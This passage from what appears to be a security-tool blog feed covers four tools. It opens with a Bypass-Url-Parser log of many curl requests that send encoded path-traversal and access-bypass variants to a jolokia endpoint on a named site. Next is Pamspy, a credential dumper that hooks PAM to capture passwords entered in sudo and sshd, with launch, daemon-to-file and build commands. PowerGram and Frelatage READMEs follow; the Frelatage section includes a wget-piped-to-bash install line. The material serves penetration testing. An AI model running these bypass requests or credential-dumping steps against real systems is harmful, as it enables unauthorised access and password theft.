'http://thinkloveshare.com//api/jolokia//%2e//list 2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e///list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Curren t: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f///list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%20%23//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%23//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f///list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w ' \nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/..//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//%2f..///list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'ht tp://thinkloveshare.com//api/jolokia//%3b/%2e.//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e%2e/..%2f%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2f%2f..///list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolo kia//%3b%09//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f..//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e.//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e%2f%2e%2e%2f%2f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%23//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl - sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%3f//list'<br />2022-05-10 15:54:09 work bup[738125] WARNING Stage: save_and_quit<br />2022-05-10 15:54:10 work bup[738125] INFO Saving html pages and short output in: /tmp/tmp48drf_ie-bypass-url-parser<br />2022-05-10 15:54:10 work bup[738125] INFO Triaged results shows the following distinct pages:<br /> 9: 41 - 850a2bd214c68f582aaac1c84c702b5d.html<br /> 10: 97 - 219145da181c48fea603aab3097d8201.html<br /> 10: 99 - 309b8397d07f618ec07541c418979a84.html<br /> 10: 100 - 9a1304f66bfee2130b34258635d50171.html<br /> 10: 108 - b61052875693afa4b86d39321d4170b4.html<br /> 10: 109 - 6fb5c59f5c29d23e407d6f041523a2bb.html<br /> 11: 101 - 045d36e3cfba7f6cbb7e657fc6cf1125.html<br /> 12:43116 - 9787a734c56b37f7bf5d78aaee43c55d.html<br /> 1 6: 41 - c5663aedf1036c950a5d83bd83c8e4e7.html<br /> 21: 156 - 7857d3d4a9bc8bf69278bf43c4918909.html<br /> 22: 107 - 011ca570bdf2e5babcf4f99c4cd84126.html<br /> 22: 109 - 6d4b61258386f744a388d402a5f11d03.html<br /> 22: 110 - 2f26cd3ba49e023dbda4453e5fd89431.html<br /> 76: 821 - bfe5f92861f949e44b355ee22574194a.html<br />2022-05-10 15:54:10 work bup[738125] INFO Also, inspect them manually with batcat:<br />echo /tmp/tmp48drf_ie-bypass-url-parser/{850a2bd214c68f582aaac1c84c702b5d.html,219145da181c48fea603aab3097d8201.html,309b8397d07f618ec07541c418979a84.html,9a1304f66bfee2130b34258635d50171.html,b61052875693afa4b86d39321d4170b4.html,6fb5c59f5c29d23e407d6f041523a2bb.html,045d36e3cfba7f6cbb7e657fc6cf1125.html,9787a734c56b37f7bf5d78aaee43c55d.html,c5663aedf1036c950a5d83bd83c8e4e7.html,7857d3d4a9bc8bf69278bf43c4918909.html,011ca570bdf2e5babcf4f99c4cd84126.html,6d4b61258386f744a388d402a5f11d03.html,2f26cd3ba49e023dbda4453e5fd89431.html,bfe5f92861f949e44b355ee22574194a.html} | xa rgs bat<br /></code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/laluka/bypass-url-parser" rel="nofollow" target="_blank" title="Download Bypass-Url-Parser">Download Bypass-Url-Parser</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-44049287787944973242022-07-09T08:30:00.000-04:002022-07-09T08:30:00.259-04:00Pamspy - Credentials Dumper For Linux Using eBPF<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh630pwXroI0REuPFjnkP3e1xi4NBs92ScdIQ8WoIiyYGgfd2PjTMB-Gb4WKGasgXeSlrj_0V-7ALK55nPcGEE9F-up_HhV9zilOjx1xPSNWd-zP5kPyuYR51YHhClJGxdvR5TMwK0wWzG1Y6U77oZoM2nZyoEgvIfxAVK2RVsKV3hImD8IR8XT-SMd"><img alt="" border="0" height="360" id="BLOGGER_PHOTO_ID_7117889920680691090" src="https://blogger.googleusercontent.com/img/a/AVvXsEh630pwXroI0REuPFjnkP3e1xi4NBs92ScdIQ8WoIiyYGgfd2PjTMB-Gb4WKGasgXeSlrj_0V-7ALK55nPcGEE9F-up_HhV9zilOjx1xPSNWd-zP5kPyuYR51YHhClJGxdvR5TMwK0wWzG1Y6U77oZoM2nZyoEgvIfxAVK2RVsKV3hImD8IR8XT-SMd=w640-h360" width="640" /></a></p><div><br /></div> <p dir="auto"><code>pamspy</code> leverage eBPF technologies to achieve an equivalent work of <a href="https://github.com/blendin/3snake" rel="nofollow" target="_blank" title="3snake">3snake</a>.</p> <p dir="auto">It will track a particular <a href="https://www.kitploit.com/search/label/UserLAnd" target="_blank" title="userland">userland</a> function inside the PAM (Pluggable <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="Authentication">Authentication</a> Modules) library, used by many critical applications to handle authentication like:</p> <ul dir="auto"> <li>sudo</li> <li>sshd</li> <li>passwd</li> <li>gnome</li> <li>x11</li> <li>and many other ...</li> </ul> <span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">How to launch?</h2> <p dir="auto"><code>pamspy</code> is built as a static binary without any dependencies, and available on the <a href="https://github.com/citronneur/pamspy/releases/" rel="nofollow" target="_blank" title="release">release</a> page.</p> <div><pre><code>Usage: pamspy [OPTION...]<br />pamspy<br /><br />Uses eBPF to dump secrets use by PAM (Authentication) module<br />By <a href="https://www.kitploit.com/search/label/Hooking" target="_blank" title="hooking">hooking</a> the pam_get_authtok function in libpam.so<br /><br />USAGE: ./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4) -d /var/log/trace.0<br /><br /> -d, --daemon=PATH TO OUTPUT CREDENTIALS<br /> Start pamspy in daemon mode and output in the file<br /> passed as argument<br /> -p, --path=PATH Path to the libpam.so file<br /> -r, --print-headers Print <a href="https://www.kitploit.com/search/label/Headers" target="_blank" title="headers">headers</a> of the program<br /> -v, --verbose Verbose mode<br /> -?, --help Give this help list<br /> --usage Give a short usage message<br /> -V, --version Print program version<br /> <br />Mandatory or optional arguments to long options are also mandatory or optional<br />for any corresponding short options.<br /><br />Report bugs to .<br /><br /></code></pre></div> <p dir="auto">As <code>pamspy</code> rely on libpam, we have to set the path where libpam is installed on your distribution. To find where libpam is installed you can run the following command :</p> <div><pre><code>> /usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4<br />/lib/x86_64-linux-gnu/libpam.so.0<br /></code></pre></div> <p dir="auto">Once you get the path you can launch <code>pamspy</code> :</p> <div><pre><code>> ./pamspy -p /lib/x86_64-linux-gnu/libpam.so.0<br /></code></pre></div> <p dir="auto">An easy way to launch <code>pamspy</code> is to use the following command :</p> <div><pre><code>> ./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4)<br /></code></pre></div> <p dir="auto"><code>pamspy</code> can also be started as a daemon by providing an output file where credentials will be written:</p> <div><pre><code>./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4) -d /tmp/credentials<br /></code></pre></div> <h2 dir="auto">How to build?</h2> <p dir="auto">To build the static binary, we need third-party program. For eBPF we need <code>clang</code> to compile the C code into eBPF CO-RE code. We also rely on <code>bpftool</code> to create a skeleton from ebpf program to include it in our userland program. Then we need also <code>libelf</code> to find the correct symbol in libpam.</p> <div><pre><code>sudo apt install make clang-11 gcc libelf-dev bpftool<br /></code></pre></div> <p dir="auto">Then just build!</p> <div><pre><code>git clone https://github.com/citronneur/pamspy --recursive<br />cd pamspy/src<br />make<br /></code></pre></div> <h2 dir="auto">How does It works?</h2> <p dir="auto"><code>pamspy</code> will load a userland return probe eBPF program to hook the <code>pam_get_authtok</code> function from <code>libpam.so</code>. PAM stands for "Pluggable Authentication Modules", and have a flexible design to manage a different kind of authentication on Linux.</p> <p dir="auto">Each time an authentication process tries to check a new user, It will call <code>pam_get_authtok</code>, and will be here to dump the content of the critical secrets!</p> <p dir="auto">Easy! Enjoy!</p> <h2 dir="auto">Credits and references</h2> <p dir="auto">Thanks to @blendin for 3snake tool !!!</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/citronneur/pamspy" rel="nofollow" target="_blank" title="Download Pamspy">Download Pamspy</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-56670650266448379172022-06-01T10:00:00.000-04:002022-06-01T10:00:02.122-04:00PowerGram - Multiplatform Telegram Bot In Pure PowerShell<p align="center" dir="auto"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjehzbXT_1fjmcs2YwFwlbW74hUJKZuMgZlOGah8e0R1rSiam777CAHBIkMpBfqCJX0Ku_nztSoQ7V11MYotzEqyCXCJMOyoRQHpOgyxgAns2bM9gEz4KszUC2CVxpwTiYKu2sB6_kjqJnJdaiZfSidRZJJMA-PpsPI13DJWQm1VnjpE-2bLvbJFSQB"><img alt="" border="0" height="400" id="BLOGGER_PHOTO_ID_7103840857639290338" src="https://blogger.googleusercontent.com/img/a/AVvXsEjehzbXT_1fjmcs2YwFwlbW74hUJKZuMgZlOGah8e0R1rSiam777CAHBIkMpBfqCJX0Ku_nztSoQ7V11MYotzEqyCXCJMOyoRQHpOgyxgAns2bM9gEz4KszUC2CVxpwTiYKu2sB6_kjqJnJdaiZfSidRZJJMA-PpsPI13DJWQm1VnjpE-2bLvbJFSQB=w640-h400" width="640" /></a></p><p align="center" dir="auto"><br /></p> <p dir="auto"><strong>PowerGram</strong> is a pure <a href="https://www.kitploit.com/search/label/PowerShell" target="_blank" title="PowerShell">PowerShell</a> <a href="https://www.kitploit.com/search/label/Telegram" target="_blank" title="Telegram">Telegram</a> Bot that can be run on Windows, <a href="https://www.kitploit.com/search/label/Linux" target="_blank" title="Linux">Linux</a> or Mac OS. To make use of it, you only need PowerShell 4 or higher and an internet connection.</p> <p dir="auto">All communication between the Bot and Telegram servers is encrypted with HTTPS, but all requests will be sent in GET method, so they could easily be intercepted.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto">Requirements</h1> <ul dir="auto"> <li>PowerShell 4.0 or greater</li> </ul> <h1 dir="auto">Download</h1> <p dir="auto">It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:</p> <div><pre><code>git clone https://github.com/JoelGMSec/PowerGram<br /></code></pre></div> <h1 dir="auto">Usage</h1> <div><pre><code>.\PowerGram -h<br /><br /> ____ ____ <br /> | _ \ __ __ __ __ _ __ / ___|_ __ __ _ _ __ ___ <br /> | |_) / _ \ \ /\ / / _ \ '__| | _| '__/ _' | '_ ' _ \ <br /> | __/ (_) \ V V / __/ | | |_| | | | (_| | | | | | | <br /> |_| \___/ \_/\_/ \___|_| \____|_| \__,_|_| |_| |_| <br /><br /> ------------------- by @JoelGMSec ------------------- <br /><br /> Info: PowerGram is a pure PowerShell Telegram Bot<br /> that can be run on Windows, Linux or Mac OS<br /><br /> Usage: PowerGram from PowerShell<br /> .\PowerGram.ps1 -h Show this help message<br /> .\PowerGram.ps1 -run Start PowerGram Bot<br /><br /> PowerGram from Telegram<br /> /getid Get your Chat ID from Bot<br /> /help Show all available commands<br /><br /> Warning: All commands will be sent using HTTPS GET requests<br /> You need your Chat ID & Bot Token to run PowerGram<br /><br /></code></pre></div> <h3 dir="auto">The detailed guide of use can be found at the following link:</h3> <p dir="auto"><a href="https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell" rel="nofollow" target="_blank" title="https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell">https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell</a></p> <h1 dir="auto">License</h1> <p dir="auto">This project is licensed under the <a href="https://www.kitploit.com/search/label/GNU" target="_blank" title="GNU">GNU</a> 3.0 license - see the LICENSE file for more details.</p> <h1 dir="auto">Credits and Acknowledgments</h1> <p dir="auto">This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec</p> <h1 dir="auto">Contact</h1> <p dir="auto">This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.</p> <p dir="auto">For more information, you can find me on <a href="https://www.kitploit.com/search/label/Twitter" target="_blank" title="Twitter">Twitter</a> as <a href="https://twitter.com/JoelGMSec" rel="nofollow" target="_blank" title="@JoelGMSec">@JoelGMSec</a> and on my blog <a href="https://darkbyte.net" rel="nofollow" target="_blank" title="darkbyte.net">darkbyte.net</a>.</p><p dir="auto"><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JoelGMSec/PowerGram" rel="nofollow" target="_blank" title="Download PowerGram">Download PowerGram</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-69100578008326166832022-05-23T17:30:00.007-04:002022-05-23T17:30:00.270-04:00Frelatage - The Python Fuzzer That The World Deserves<p align="center" dir="auto"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiKCpLvDt8ohflu5wxVoJAvfGKpdQsz_NCeTIZuYbWYjQdhxPozVKhyMotTauXVpTzP3YbZ61x80OzU1BqnSvW-Ju7mWZzTapi5cjEdzQOH4bb9fkGVY4Kna-F93fBB75zI-XUHf3ohwcgQKXyfpfMPYVWlKcLxzW0LH-H_XvikPLo03R9nZ9s_nICD"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7100792676888970978" src="https://blogger.googleusercontent.com/img/a/AVvXsEiKCpLvDt8ohflu5wxVoJAvfGKpdQsz_NCeTIZuYbWYjQdhxPozVKhyMotTauXVpTzP3YbZ61x80OzU1BqnSvW-Ju7mWZzTapi5cjEdzQOH4bb9fkGVY4Kna-F93fBB75zI-XUHf3ohwcgQKXyfpfMPYVWlKcLxzW0LH-H_XvikPLo03R9nZ9s_nICD=s320" /></a> <br /> <code>pip3 install frelatage</code><br /> <i>Current release : <a href="https://github.com/Rog3rSm1th/Frelatage/releases" rel="nofollow" target="_blank" title="0.0.7">0.0.7</a></i><br /></p> <p align="center" dir="auto"> <a href="https://github.com/Rog3rSm1th/Frelatage/blob/main/doc/frelatage_demo.gif?raw=true" rel="nofollow" target="_blank" title="The Python Fuzzer that the world deserves <g-emoji alias=snake class=g-emoji fallback-src=https://github.githubassets.com/images/icons/emoji/unicode/1f40d.png>&#128013;</g-emoji> (13)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhz9SJRq419M_Gdkr3Aqjx-Cfl3a8aeH-aRdNIVb3QwXhf4JQj21_0rvWpUJy4XFuiNVb-RZrJUvWlgIZqX1TxJjnELcibepnIl2Ww5WrUf3RF9qbGUyV7m21HkH7_X73UgZd2DekelJ45Ge6LbaqXRBpPWvSCXMbyi_UvX-hadhDcMWVyngI_mK9LC"><img alt="" border="0" height="156" id="BLOGGER_PHOTO_ID_7100792697909328594" src="https://blogger.googleusercontent.com/img/a/AVvXsEhz9SJRq419M_Gdkr3Aqjx-Cfl3a8aeH-aRdNIVb3QwXhf4JQj21_0rvWpUJy4XFuiNVb-RZrJUvWlgIZqX1TxJjnELcibepnIl2Ww5WrUf3RF9qbGUyV7m21HkH7_X73UgZd2DekelJ45Ge6LbaqXRBpPWvSCXMbyi_UvX-hadhDcMWVyngI_mK9LC=w640-h156" width="640" /></a> </p> <p dir="auto">Frelatage is a coverage-based Python fuzzing library which can be used to fuzz python code. The development of Frelatage was inspired by various other fuzzers, including <a href="https://github.com/google/AFL" rel="nofollow" target="_blank" title="AFL">AFL</a>/<a href="https://github.com/AFLplusplus/AFLplusplus" rel="nofollow" target="_blank" title="AFL++">AFL++</a>, <a href="https://github.com/google/atheris" rel="nofollow" target="_blank" title="Atheris">Atheris</a> and <a href="https://github.com/fuzzitdev/pythonfuzz" rel="nofollow" target="_blank" title="PythonFuzz">PythonFuzz</a>. The main purpose of the project is to take advantage of the best features of these fuzzers and gather them together into a new tool in order to efficiently fuzz python applications.</p> <p dir="auto"><strong>DISCLAIMER</strong> : This project is at the alpha stage and can still cause many unexpected behaviors. Frelatage should not be used in a production environment at this time.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">Requirements</h2> <p dir="auto"><a href="https://www.python.org/" rel="nofollow" target="_blank" title="Python 3">Python 3</a></p> <h2 dir="auto">Installation</h2> <h4 dir="auto">Install with pip (recommended)</h4> <div><pre><code>pip3 install frelatage</code></pre></div> <h4 dir="auto">Or build from source</h4> <p dir="auto">Recommended for developers. It automatically clones the main branch from the frelatage repo, and installs from source.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="# Automatically clone the Frelatage repository and install Frelatage from source bash <(wget -q https://raw.githubusercontent.com/Rog3rSm1th/Frelatage/main/scripts/autoinstall.sh -O -)"><pre><code># Automatically clone the Frelatage repository and install Frelatage from source<br />bash <(wget -q https://raw.githubusercontent.com/Rog3rSm1th/Frelatage/main/scripts/autoinstall.sh -O -)</code></pre></div> <h2 dir="auto">How it works</h2> <p dir="auto">The idea behind the design of Frelatage is the usage of a genetic algorithm to generate mutations that will cover as much code as possible. The functioning of a fuzzing cycle can be roughly summarized with this diagram :</p> <section aria-label="enrichable markdown container" class="js-render-needs-enrichment render-needs-enrichment mb-4 position-relative" data-content="{"data":"graph TB\n\n m1(Mutation 1) --&gt; |input| function(Fuzzed function)\n m2(Mutation 2) --&gt; |input| function(Fuzzed function)\n mplus(Mutation ...) --&gt; |input| function(Fuzzed function)\n mn(Mutation n) --&gt; |input| function(Fuzzed function)\n \n function --&gt; generate_reports(Generate reports)\n generate_reports --&gt; rank_reports(Rank reports) \n rank_reports --&gt; select(Select n best reports)\n \n select --&gt; |mutate| nm1(Mutation 1) &amp; nm2(Mutation 2) &amp; nmplus(Mutation ...) &amp; nmn(Mutation n)\n \n subgraph Cycle mutations\n direction LR\n m1\n m2\n mplus\n mn\n end\n \n subgraph Next cycle mutations\n direction LR\n nm1\n nm2\n nmplus\n nmn\n end\n \n style function fill:#538 8e8,stroke:white,stroke-width:4px\n"}" data-host="https://viewscreen.githubusercontent.com" data-identity="8c5f29b1-7d6b-4a4a-bc1c-12bc07e01793" data-src="https://viewscreen.githubusercontent.com/markdown/mermaid" data-type="mermaid"> <section aria-label="mermaid rendered output container" class="js-render-enrichment-target"></section> <span> <svg class="octospinner mx-auto anim-rotate" data-view-component="true" fill="none" height="16" style="box-sizing: content-box; color: var(--color-icon-primary);" viewbox="0 0 16 16" width="16"> <circle cx="8" cy="8" r="7" stroke-opacity="0.25" stroke-width="2" stroke="currentColor" vector-effect="non-scaling-stroke"></circle> <path d="M15 8a7.002 7.002 0 00-7-7" stroke-linecap="round" stroke-width="2" stroke="currentColor" vector-effect="non-scaling-stroke"></path> </svg> </span> <section aria-label="Raw mermaid code" class="render-plaintext-hidden js-render-plaintext"> <pre><code>graph TB<br /><br /> m1(Mutation 1) --&gt; |input| function(Fuzzed function)<br /> m2(Mutation 2) --&gt; |input| function(Fuzzed function)<br /> mplus(Mutation ...) --&gt; |input| function(Fuzzed function)<br /> mn(Mutation n) --&gt; |input| function(Fuzzed function)<br /> <br /> function --&gt; generate_reports(Generate reports)<br /> generate_reports --&gt; rank_reports(Rank reports) <br /> rank_reports --&gt; select(Select n best reports)<br /> <br /> select --&gt; |mutate| nm1(Mutation 1) &amp; nm2(Mutation 2) &amp; nmplus(Mutation ...) &amp; nmn(Mutation n)<br /> <br /> subgraph Cycle mutations<br /> direction LR<br /> m1<br /> m2<br /> mplus<br /> mn<br /> end<br /> <br /> subgraph Next cycle mutations<br /> direction LR<br /> nm1<br /> nm2<br /> nmplus<br /> nmn<br /> end<br /> <br /> style function fill:#5388e8,stroke:white,stroke-width:4px<br /></code></pre> </section> </section> <h2 dir="auto">Features</h2> <h4 dir="auto">Fuzzing different argument types:</h4> <ul dir="auto"> <li>String</li> <li>Int</li> <li>Float</li> <li>List</li> <li>Tuple</li> <li>Dictionary</li> </ul> <h4 dir="auto">File fuzzing</h4> <p dir="auto">Frelatage allows to fuzz a function by passing a file as input.</p> <h4 dir="auto">Fuzzer efficiency</h4> <ul dir="auto"> <li>Corpus</li> <li>Dictionnary</li> </ul> <h2 dir="auto">Use Frelatage</h2> <h4 dir="auto">Fuzz a classical parameter</h4> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="import frelatage import my_vulnerable_library def MyFunctionFuzz(data): my_vulnerable_library.parse(data) input = frelatage.Input(value="initial_value") f = frelatage.Fuzzer(MyFunctionFuzz, [[input]]) f.fuzz()"><pre><code>import frelatage<br />import my_vulnerable_library<br /><br />def MyFunctionFuzz(data):<br /> my_vulnerable_library.parse(data)<br /><br />input = frelatage.Input(value="initial_value")<br />f = frelatage.Fuzzer(MyFunctionFuzz, [[input]])<br />f.fuzz()</code></pre></div> <h4 dir="auto">Fuzz a file parameter</h4> <p dir="auto">Frelatage gives you the possibility to fuzz file type input parameters. To initialize the value of these files, you must create files in the input folder (<code>./in</code> by default).</p> <p dir="auto">If we want to initialize the value of a file used to fuzz, we can do it like this:</p> <div><pre><code>echo "initial value" > ./in/input.txt</code></pre></div> <p dir="auto">And then run the fuzzer:</p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="import frelatage import my_vulnerable_library def MyFunctionFuzz(data): 